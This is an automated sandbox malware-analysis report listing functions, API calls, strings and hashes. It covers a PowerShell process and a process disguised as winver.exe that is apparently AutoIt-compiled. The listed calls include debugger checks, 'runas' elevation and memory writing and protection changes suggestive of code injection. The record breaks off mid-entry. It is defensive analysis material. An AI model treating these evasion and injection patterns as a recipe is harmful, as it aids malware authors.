Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5031654774545d7124c9e67f745235a842e07ec6fcdfc8d2ebaf4afe57c07b16
Instruction ID: af0e07d0c447b0a6629e69132d5ec60bbada8a12aba8981291d09f9d2bed191b
Opcode Fuzzy Hash: 5031654774545d7124c9e67f745235a842e07ec6fcdfc8d2ebaf4afe57c07b16
Instruction Fuzzy Hash: 1121D832A0EB8D4FD755EF2884695E87FE0EF65301F0502BBD48DC71B2DE2969488782

Function 00007FFD9B7FBF11 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70772973896497d59d769acdeb1bc46d72ba73a67c4ef1c129caa35b2d2819ba
Instruction ID: d264ad07fe0bbcd2d8e8f04103a6baba5f7de5a33090b41fda03d566435c0bc7
Opcode Fuzzy Hash: 70772973896497d59d769acdeb1bc46d72ba73a67c4ef1c129caa35b2d2819ba
Instruction Fuzzy Hash: 54018631609A4C8FCB14DF54D459DE67FF0EF5A311B0642AAE44EC7572CB25A908CBD1

Function 00007FFD9B7F3605 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
Instruction ID: df649c81f0f35a2aa98f75bf3936660fe43ac3b5d9de2dd75fefc379fa0cfbc9
Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
Instruction Fuzzy Hash: 1901A77020CB0C4FD748EF4CE051AA9B7E0FB85320F10056DE58AC36A1D632E881CB45

Function 00007FFD9B7FA989 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7cf730051c22f91464c898505019e6cce4269c4ea0e1dec234b8a53d07242a
Instruction ID: 777f14394cc8a26cff68cf7926b1f5ab3b0791086b16b9b1f20828b88216016d
Opcode Fuzzy Hash: 3f7cf730051c22f91464c898505019e6cce4269c4ea0e1dec234b8a53d07242a
Instruction Fuzzy Hash: 4E017131B1E74E4FE7759F6484767B53EA0EF19301F4201BAE449C61F2EE1CA9448355

Function 00007FFD9B7FA6AA Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd2569b722c180d2a4c939edc0ed59bfd33b74448602a975f251fc0f4344ba33
Instruction ID: 0e28188fb7d6f28585a01d5dec7131e002f67e38dc7fd9ce23e964069bab005f
Opcode Fuzzy Hash: fd2569b722c180d2a4c939edc0ed59bfd33b74448602a975f251fc0f4344ba33
Instruction Fuzzy Hash: FBF0BB32F0AE5F0BEB64A6E844781B47AD1EFA81517461736D85ED31B0EC085A4102C5

Function 00007FFD9B7FA6B0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daef5746555ae2ee3ee0d0b7cdf7d1e98761db90e525a225fb58298eb6d63d12
Instruction ID: 3d713c3b2eeffa7b136c2fd2490f4ad368c3003729bd5431cb04f35940dfcc35
Opcode Fuzzy Hash: daef5746555ae2ee3ee0d0b7cdf7d1e98761db90e525a225fb58298eb6d63d12
Instruction Fuzzy Hash: 85F0A732F0AE1E0BEB74B2EC546C1B575D1EFE8251B421B3AD85ED3174EC185A8142C5

Function 00007FFD9B8C6230 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1939434298.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbbfb7563687bdacd18099ee8dd262c9ef35356384612bce18de05d7a668d9
Instruction ID: 25252ced5c060a42cb4d245519691e947ca89fd766ccd3b2c46853ff3c19739c
Opcode Fuzzy Hash: 35cbbfb7563687bdacd18099ee8dd262c9ef35356384612bce18de05d7a668d9
Instruction Fuzzy Hash: 17C01200B1FAED0ADB6577A824251AD29A09B4512070600E6E418D62A7DC0C4D8583C5

Non-executed Functions

Function 00007FFD9B7F89FA Relevance: 6.3, Strings: 5, Instructions: 88COMMON

Download Yara Rule

Strings

L_^,, xrefs: 00007FFD9B7F8A2A
L_^+, xrefs: 00007FFD9B7F8A22
L_^, xrefs: 00007FFD9B7F8A6A
L_S, xrefs: 00007FFD9B7F8A65
L_^!, xrefs: 00007FFD9B7F89FA

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^!$L_^+$L_^,$L_S
API String ID: 0-665127133
Opcode ID: 9797cf279f9a9e7633d94ac0fa423fd01898745a53a629e95db9e964a1d4013c
Instruction ID: 77569ea44c0c806cec6a51bf1cd7ac9c85c5c13424a2a1ea09fae53a59c745ea
Opcode Fuzzy Hash: 9797cf279f9a9e7633d94ac0fa423fd01898745a53a629e95db9e964a1d4013c
Instruction Fuzzy Hash: D0218177B090850BC316A7A978514EC7B91EFC022D71D82F6C2AC8F297DF24504D87C5

Function 00007FFD9B7F87E0 Relevance: 5.2, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9B7F886A
L_^, xrefs: 00007FFD9B7F892A
L_^, xrefs: 00007FFD9B7F8972
L_^, xrefs: 00007FFD9B7F88C9

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-1575745794
Opcode ID: 9a2b2d8c9c08bb01b9fec62efa8dd003a874d3a76ffa3944d6d8737b003dec6f
Instruction ID: a59b9f4fec8e8bb590c63ec8ad5222dbaba36bf9537bf755d0d83406985bef4c
Opcode Fuzzy Hash: 9a2b2d8c9c08bb01b9fec62efa8dd003a874d3a76ffa3944d6d8737b003dec6f
Instruction Fuzzy Hash: 9F510B6BF0D2D10BD316B7AC74B54ED3BA0DF8132D71E81F2D1E88E0A7ED18644A8285

Function 00007FFD9B7F8800 Relevance: 5.2, Strings: 4, Instructions: 198COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9B7F886A
L_^, xrefs: 00007FFD9B7F892A
L_^, xrefs: 00007FFD9B7F8972
L_^, xrefs: 00007FFD9B7F88C9

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-1575745794
Opcode ID: 723400f13e0b41e0ae87901876d6a9dcc600ac2a41676e3b611829b20d146876
Instruction ID: b9aa1f1d01c7ea7c9b8be23c2efd159c571ba87f1ee3d35d7983883c80fc6f86
Opcode Fuzzy Hash: 723400f13e0b41e0ae87901876d6a9dcc600ac2a41676e3b611829b20d146876
Instruction Fuzzy Hash: DB510B6BF192D10BD306B7AC78B54ED3BA0DF8136D71A81F6D1E98E1A3ED18244A4285

Analysis Process: winver.exePID: 7284, Parent PID: 7352COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	4.7%
Signature Coverage:	9.2%
Total number of Nodes:	980
Total number of Limit Nodes:	39

Executed Functions

Function 00007FF63D793B18 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793B5A
IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793B6F
GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793BE9

Part of subcall function 00007FF63D792BA0: GetFullPathNameW.KERNEL32(D000000000000000,00007FF63D793C1B,?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D792C01

SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D793C80
MessageBoxA.USER32 ref: 00007FF63D7DB1DC
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D7DB229
GetForegroundWindow.USER32(?,?,?,?,?,00007FF63D792B75), ref: 00007FF63D7DB2B0
ShellExecuteW.SHELL32 ref: 00007FF63D7DB2D7

Part of subcall function 00007FF63D793CA0: GetSysColorBrush.USER32 ref: 00007FF63D793CBA
Part of subcall function 00007FF63D793CA0: LoadCursorW.USER32 ref: 00007FF63D793CCA
Part of subcall function 00007FF63D793CA0: LoadIconW.USER32 ref: 00007FF63D793CDF
Part of subcall function 00007FF63D793CA0: LoadIconW.USER32 ref: 00007FF63D793CF8
Part of subcall function 00007FF63D793CA0: LoadIconW.USER32 ref: 00007FF63D793D11
Part of subcall function 00007FF63D793CA0: LoadImageW.USER32 ref: 00007FF63D793D3D
Part of subcall function 00007FF63D793CA0: RegisterClassExW.USER32 ref: 00007FF63D793DA1

Part of subcall function 00007FF63D793DD8: CreateWindowExW.USER32 ref: 00007FF63D793E28
Part of subcall function 00007FF63D793DD8: CreateWindowExW.USER32 ref: 00007FF63D793E7B
Part of subcall function 00007FF63D793DD8: ShowWindow.USER32 ref: 00007FF63D793E91

Part of subcall function 00007FF63D794528: Shell_NotifyIconW.SHELL32 ref: 00007FF63D794620

Strings

AutoIt, xrefs: 00007FF63D7DB1CC
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00007FF63D7DB1D3
runas, xrefs: 00007FF63D7DB2BB

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 1593035822-2030392706
Opcode ID: 274a2bc919b6e93c1b53ce726540b3f73bbf9d28baa519e556b724750c033cec
Instruction ID: 23a72fae4eeb80e0d31cda16f4aef66450821e49f78f6c78c865ef35f5697476
Opcode Fuzzy Hash: 274a2bc919b6e93c1b53ce726540b3f73bbf9d28baa519e556b724750c033cec
Instruction Fuzzy Hash: 5D613A62E1CA8B95EA20ABE0E8415F96775BF41754F800136E54DC67AAFF3CF54AE300

Function 000001F9F2BB0AD0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 288
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenSection.NTDLL ref: 000001F9F2BB0CBA
NtMapViewOfSection.NTDLL ref: 000001F9F2BB0CFE
NtProtectVirtualMemory.NTDLL ref: 000001F9F2BB0DB3
NtProtectVirtualMemory.NTDLL ref: 000001F9F2BB0DEB
NtUnmapViewOfSection.NTDLL ref: 000001F9F2BB0E07
NtClose.NTDLL ref: 000001F9F2BB0E0F

Strings

@, xrefs: 000001F9F2BB0CAF
.tex, xrefs: 000001F9F2BB0D3B
0, xrefs: 000001F9F2BB0CA4
l, xrefs: 000001F9F2BB0BFD

Memory Dump Source

Source File: 0000000B.00000002.2947934764.000001F9F2BB0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F9F2BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f9f2bb0000_winver.jbxd

Similarity

API ID: Section$MemoryProtectViewVirtual$CloseOpenUnmap
String ID: .tex$0$@$l
API String ID: 2467859603-2414313349
Opcode ID: f87a35eca521e40a16898200c5294c14de0d37047c90d28a5546894c3bf611a5
Instruction ID: c8ab7ecd70e45f407e599d92585d988950ecace42c993fe3e4d14a908f0db170
Opcode Fuzzy Hash: f87a35eca521e40a16898200c5294c14de0d37047c90d28a5546894c3bf611a5
Instruction Fuzzy Hash: 82A1B7306187498FD764EF14C449BBAB7E1FBC5311F508A7ED88AD72A0DB71A885C782

Function 00007FF63D7B2D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32 ref: 00007FF63D7B2D58
GetCurrentProcess.KERNEL32 ref: 00007FF63D7B2EEF
IsWow64Process.KERNEL32 ref: 00007FF63D7B2EFF
GetSystemInfo.KERNEL32 ref: 00007FF63D7B2F38

Strings

|O, xrefs: 00007FF63D7FA7E0

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Process$CurrentInfoSystemVersionWow64
String ID: |O
API String ID: 1568231622-607156228
Opcode ID: 34ed5a74df8119c47388a9949b5ce49768c676c3429ee0bfafd0408673ae5878
Instruction ID: 6062bcccfa853fb48f61e5f9dd8060503191532b20084c500e7ec3d03c6d78f1
Opcode Fuzzy Hash: 34ed5a74df8119c47388a9949b5ce49768c676c3429ee0bfafd0408673ae5878
Instruction Fuzzy Hash: 63D18F21E0D2CAC5F761CBD5A8019B53BA6AF11B84F44013AD58EC37A9FE7CB109E751

Function 00007FF63D7A2E40 Relevance: 5.3, APIs: 3, Instructions: 832COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF63D7A41E6

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: a6960b92db4b4e6ec35a6ed164eeecdc86aff14aea942a02bcd3b7fd08ff1d6b
Instruction ID: 839b1cc2f9e3a833cd77604c2ec528191685cd19e773d524c41ea0c84ab6442a
Opcode Fuzzy Hash: a6960b92db4b4e6ec35a6ed164eeecdc86aff14aea942a02bcd3b7fd08ff1d6b
Instruction Fuzzy Hash: F9824736E09A5A86EA508FD5E4446B963B5FB44B88F504036EE4EC77A4EF3DF851E300

Function 000001F9F2BB0787 Relevance: 4.6, APIs: 3, Instructions: 133
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001F9F2BB06A2: SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000001F9F2BB0734), ref: 000001F9F2BB06CC

NtWriteVirtualMemory.NTDLL ref: 000001F9F2BB07B7
NtProtectVirtualMemory.NTDLL ref: 000001F9F2BB07EB
NtAllocateVirtualMemory.NTDLL ref: 000001F9F2BB0885

Memory Dump Source

Source File: 0000000B.00000002.2947934764.000001F9F2BB0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F9F2BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f9f2bb0000_winver.jbxd

Similarity

API ID: MemoryVirtual$AllocateProtectSleepWrite
String ID:
API String ID: 3964029510-0
Opcode ID: 92847245cef68d1ca515a282de503d36828549c44956303efe8e9027b641f601
Instruction ID: 36935e2c57a6a99d5de21f187d3dcb3a0246a3c443f40b504a9b760370fdb9b7
Opcode Fuzzy Hash: 92847245cef68d1ca515a282de503d36828549c44956303efe8e9027b641f601
Instruction Fuzzy Hash: 4041913025CB598FE768FA2894447BABBD1FBE9351F80097EE5CAC3251DA70D4418B82

Function 000001F9F2BB0970 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 000001F9F2BB0A23

Strings

ZL;, xrefs: 000001F9F2BB0A33

Memory Dump Source

Source File: 0000000B.00000002.2947934764.000001F9F2BB0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F9F2BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f9f2bb0000_winver.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: ZL;
API String ID: 2706961497-564850408
Opcode ID: 0c57134e1c54b652f242d1d7b2211c466d3807fb9c1bfd78a01a334f77d4836e
Instruction ID: 53666ede7a13749c32558a041905c80d84711d4a35458ab318f95fee7aed14d6
Opcode Fuzzy Hash: 0c57134e1c54b652f242d1d7b2211c466d3807fb9c1bfd78a01a334f77d4836e
Instruction Fuzzy Hash: 4E413D30218A4D4FEB94EB2CC454BBABBE1FBD9351FD0497AB54AC3291DE35D8418741

Function 00007FF63D79BA1C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF63D7AE560: GetModuleFileNameW.KERNEL32(?,00007FF63D79BB08,?,?,?,00007FF63D79109E), ref: 00007FF63D7AE57F

Part of subcall function 00007FF63D7B4028: GetFullPathNameW.KERNEL32(?,00007FF63D79BB17,?,?,?,00007FF63D79109E), ref: 00007FF63D7B404F

RegOpenKeyExW.KERNEL32(?,?,?,00007FF63D79109E), ref: 00007FF63D79BB71
RegQueryValueExW.ADVAPI32(?,?,?,00007FF63D79109E), ref: 00007FF63D7E8819
RegQueryValueExW.ADVAPI32(?,?,?,00007FF63D79109E), ref: 00007FF63D7E8881
RegCloseKey.ADVAPI32(?,?,?,00007FF63D79109E), ref: 00007FF63D7E88D0
wcscat.LIBCMT ref: 00007FF63D7E8936
wcscat.LIBCMT ref: 00007FF63D7E8967

Strings

Include, xrefs: 00007FF63D7E8807, 00007FF63D7E886A
Software\AutoIt v3\AutoIt, xrefs: 00007FF63D79BB60
\Include\, xrefs: 00007FF63D79BB17

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\Include\
API String ID: 2667193904-1575078665
Opcode ID: 4acb2f6b6effdae7c40452cf24e54b4e395e49ea1c52ccbaab6c17bface39e30
Instruction ID: 371ea239bd0184d09bd77decb37bd2231059fa0285c4d3b29b60ac9a689f3cfd
Opcode Fuzzy Hash: 4acb2f6b6effdae7c40452cf24e54b4e395e49ea1c52ccbaab6c17bface39e30
Instruction Fuzzy Hash: 58914D22A18A9B95EB20DBA4E8410B96378FF84794F405232E54DC3BA9FF7CF545E740

Function 00007FF63D794208 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32 ref: 00007FF63D794292
KillTimer.USER32 ref: 00007FF63D7942CD
SetTimer.USER32 ref: 00007FF63D7942F5
RegisterWindowMessageW.USER32 ref: 00007FF63D794302
CreatePopupMenu.USER32 ref: 00007FF63D794318
PostQuitMessage.USER32 ref: 00007FF63D79433F

Strings

TaskbarCreated, xrefs: 00007FF63D7942FB

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 7f3f5185dbc2cd5e3d148433166546a5c3300bac601c06118b4d1d8f7f860a16
Instruction ID: a21f6792c6af287b3751f9ad8c935571620572f991364688efc4aea4306f3878
Opcode Fuzzy Hash: 7f3f5185dbc2cd5e3d148433166546a5c3300bac601c06118b4d1d8f7f860a16
Instruction Fuzzy Hash: 31514632E1C64F81FA609BE4E8452B926B5BF45B88F940136D44DC27A5FE7CF509E308

Function 00007FF63D793EAC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00007FF63D793F01
RegisterClassExW.USER32 ref: 00007FF63D793F32
RegisterWindowMessageW.USER32 ref: 00007FF63D793F46
InitCommonControlsEx.COMCTL32 ref: 00007FF63D793F64
ImageList_Create.COMCTL32 ref: 00007FF63D793F7F
LoadIconW.USER32 ref: 00007FF63D793F98
ImageList_ReplaceIcon.COMCTL32 ref: 00007FF63D793FAB

Strings

TaskbarCreated, xrefs: 00007FF63D793F38
AutoIt v3 GUI, xrefs: 00007FF63D793F14

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-2659433951
Opcode ID: 2d6b964885f24945d42d2148fefa6bdc7611964d7ca6656d064d0e707c420643
Instruction ID: bd4b7cf0de43e32ca5717589e22be755b922df31489ebd42e6d310235223dbb6
Opcode Fuzzy Hash: 2d6b964885f24945d42d2148fefa6bdc7611964d7ca6656d064d0e707c420643
Instruction Fuzzy Hash: 27314832A08B098AF700CFA1E8453A937B8FB48759F104139CA4D97B64EF7CA159DB80

Function 00007FF63D793CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00007FF63D793CBA
LoadCursorW.USER32 ref: 00007FF63D793CCA
LoadIconW.USER32 ref: 00007FF63D793CDF
LoadIconW.USER32 ref: 00007FF63D793CF8
LoadIconW.USER32 ref: 00007FF63D793D11
LoadImageW.USER32 ref: 00007FF63D793D3D
RegisterClassExW.USER32 ref: 00007FF63D793DA1

Part of subcall function 00007FF63D793EAC: GetSysColorBrush.USER32 ref: 00007FF63D793F01
Part of subcall function 00007FF63D793EAC: RegisterClassExW.USER32 ref: 00007FF63D793F32
Part of subcall function 00007FF63D793EAC: RegisterWindowMessageW.USER32 ref: 00007FF63D793F46
Part of subcall function 00007FF63D793EAC: InitCommonControlsEx.COMCTL32 ref: 00007FF63D793F64
Part of subcall function 00007FF63D793EAC: ImageList_Create.COMCTL32 ref: 00007FF63D793F7F
Part of subcall function 00007FF63D793EAC: LoadIconW.USER32 ref: 00007FF63D793F98
Part of subcall function 00007FF63D793EAC: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF63D793FAB

Strings

AutoIt v3, xrefs: 00007FF63D793D5B

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: AutoIt v3
API String ID: 423443420-1704141276
Opcode ID: 7d5f449ab2c11f9e5446d86ae66c683cdd1fa79b34f5d3724583a7ddac3ab5b0
Instruction ID: e66c7f800604e981506b678ae57e64c866537f400b09ed4cac795a9fdc12193a
Opcode Fuzzy Hash: 7d5f449ab2c11f9e5446d86ae66c683cdd1fa79b34f5d3724583a7ddac3ab5b0
Instruction Fuzzy Hash: 5131E536E08F0A89E710CF91F8457A933B9FB48B59F140139C94D97B68EF7CA0599740

Function 00007FF63D7D7948 Relevance: 13.8, APIs: 9, Instructions: 272
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF63D7D7678: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D76B9
